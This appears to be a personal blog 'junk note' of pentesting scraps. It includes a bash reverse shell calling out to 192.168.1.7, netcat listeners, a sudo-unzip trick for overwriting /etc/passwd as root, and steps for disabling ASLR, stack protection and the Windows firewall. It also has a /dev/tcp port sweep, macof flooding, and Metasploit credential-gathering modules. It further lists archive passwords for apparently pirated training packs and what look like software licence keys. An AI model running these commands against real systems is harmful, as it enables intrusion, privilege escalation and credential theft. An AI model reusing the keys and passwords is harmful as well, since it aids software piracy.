Wednesday, December 23, 2020

JUNK NOTE

 xterm-256color

https://drive.google.com/drive/folders/1wvvVQRapOn9860_ETKz9RQDEXh1hVUtx?usp=sharing


bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'
python -c 'import pty; pty.spawn("/bin/bash")'
tty
Ctrl + Z
echo $TERM
stty -a
stty raw -echo
fg
nc -nlvp 1234
<here You spawn the nc session again by typing by nc -lvnp 445

reset
xterm

export SHELL=bash
export TERM=xterm-256color
stty rows 37 columns 146
bash -i

export TERM=linux
-->
zip passwd.zip passwd
sudo -u root unzip -o passwd.zip -d /etc/passwd
--

openssl passwd geek

$nc 192.168.1.6 56563 


OSWE's syllabus: https://www.offensive-security.com/do... Repository of s0j0hn: https://github.com/s0j0hn/AWAE-OSWE-Prep wetw0rk: https://github.com/wetw0rk/AWAE-PREP Links: https://www.linkedin.com/in/syedumara... https://twitter.com/syed__umar https://github.com/Anon-Exploiter Site/Side project: https://umar0x01.sh https://pentestlabs.gitbook.io

 

 

###Tools### windows-privesc-check https://github.com/pentestmonkey/wind... Windows Exploit Suggester https://github.com/AonCyberLabs/Windo... MSF Exploit Suggester post/multi/recon/local_exploit_suggester BeRoot https://github.com/AlessandroZ/BeRoot JAWS ( Just Another Windows Enum Script) https://github.com/411Hall/JAWS 

 

objdump -M intel -D start | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-7 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\\x/g' | paste -d '' -s
 

 

 

-----Disable ASLR (setting is not persistent across reboots; write 2 to the same file to restore full randomization)---------
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
-----Disable stack protector-------
gcc -fno-stack-protector -z execstack



File Password: linuxia.ir
All Book Password: @Hide01


File Password For 2020 Version: hide01.ir

File Password For 2019 Version: @sanspentest

Password For Open Books In Archives: @Hide01
darkOp: dsoftw
File Password: @Hide01-@OffSecPack
All Book Password: @Hide01
------------------
Password: dl.linuxia.ir
actux
------------------------------
File Password: @sanspentest All Book Password: @Hide01
2F3R0-FHED2-M80TY-BQYGC-NPKYF YF398-0HF8P-M81RQ-2DXQE-MZUT6 ZF71R-DMX85-08DQY-8YMNC-PPHV8 ZF3R0-FHED2-M80TY-8QYGC-NPKYF YF390-0HF8P-M81RQ-2DXQE-M2UT6 ZF71R-DMX85-08DQY-8YMNC-PPHV8 AZ3E8-DCD8J-0842Z-N6NZE-XPKYF FC11K-00DE0-0800Z-04Z5E-MC8T6
 
 
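#!/bin/bash
# TCP connect sweep of a single host using bash's /dev/tcp pseudo-device.
# Each probe is a full connect() attempt, so a complete run produces 65535
# connection attempts from one source address, which shows up clearly in
# firewall and IDS logs on the target side.
#
# The original listing had the digit 1 rendered as the letter l in both the
# address and the range, and spaces inside the brace expansion; bash then
# iterates over the literal words "{l", ".." and "65535}" instead of ports.
host=10.5.5.11
for port in {1..65535}; do
  # The 0.1 s timeout bounds each probe; a port that silently drops packets
  # is therefore indistinguishable from a closed one in this output.
  # host/port are passed as positional arguments so they are never parsed
  # as shell syntax inside the -c string.
  if timeout .1 bash -c 'echo >"/dev/tcp/$1/$2"' _ "$host" "$port"; then
    echo "port $port is open"
  fi
done
echo "Done"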

 
 
---------------------
hashcat error
sudo rm -rf ~/.hashcat/sessions/hashcat.pid
 


VBoxManage modifyvm "macos" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "macos" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "macos" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1




db_connect -y /usr/share/metasploit-framework/config/database.yml



download.phishing-server.com/dl/lucy-latest/virtualbox.zip
download.phishing-server.com/dl/lucy-latest/esxi.ova
download.phishing-server.com/dl/lucy-latest/vmware.zip
download.phishing-server.com/dl/lucy-latest/install.sh
 
macof -i wlan0 -n 15

-----Disable the firewall-----------
netsh firewall set opmode disable
-----------------------------------------------------
 
 
metasploit post exploitation phase
====================
run post/windows/gather/credentials/credential_collector
run post/windows/gather/dumplinks
run post/windows/gather/enum_applications
run post/multi/recon/local_exploit_suggester
run /post/windows/gather/usb_history
run event_manager -i
run event_manager -c
----------------------------------------------------
win Packet Scan for Enumeration of Access Control List
------------------------------------------------------
nmap -sW -O -PI -PT <URL or IP>
nmap -sV -Pn -T4 -vv 192.168.1.1
----------------------------------------
Super Network Tunnel
HTTPTunnel
HTTPORT
HTTHOST
